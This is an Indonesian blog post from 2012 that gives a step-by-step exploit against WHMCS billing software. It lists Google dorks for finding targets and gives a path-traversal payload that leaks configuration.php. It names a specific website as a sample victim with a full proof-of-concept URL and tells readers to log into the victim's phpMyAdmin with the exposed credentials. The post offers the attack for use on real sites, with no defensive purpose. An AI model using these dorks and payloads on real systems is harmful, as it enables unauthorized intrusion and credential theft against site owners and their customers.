Rabu, 04 Juli 2012

Exploit Whmcs

Lakukan pencarian menggunakan Google Dork berikut :

inurl:whmcs/cart.php?a=
inurl:billing/cart.php?a=

#dapat disesuaikan dengan selera untuk mendapatkan target.

Exploit :

/cart.php?a=test&templatefile=../../../configuration.php


Sample Target : http//socialfansfinder.com/whmcs/cart.php?
*hapus semua link sesudah whmcs/ dan pastekan exploitnya disitw.

Sample POC : http//socialfansfinder.com/whmcs/cart.php?a=test&templatefile=../../../configuration.php

Kemudian Liat Source kodenya menggunakan CTRL+U.
Terakhir Silahkan Login ke phpmyadmin situs tersebut http://domain.com/phpmyadmin .

0 komentar:

Posting Komentar

Terima Kasih Telah Berkunjung
Berkomentarlah Dengan Sopan !

:) :)) ;(( :-) =)) ;( ;-( :d :-d @-) :p :o :>) (o) [-( :-? (p) :-s (m) 8-) :-t :-b b-( :-# =p~ $-) (b) (f) x-) (k) (h) (c) cheer
Click to see the code!
To insert emoticon you must added at least one space before the code.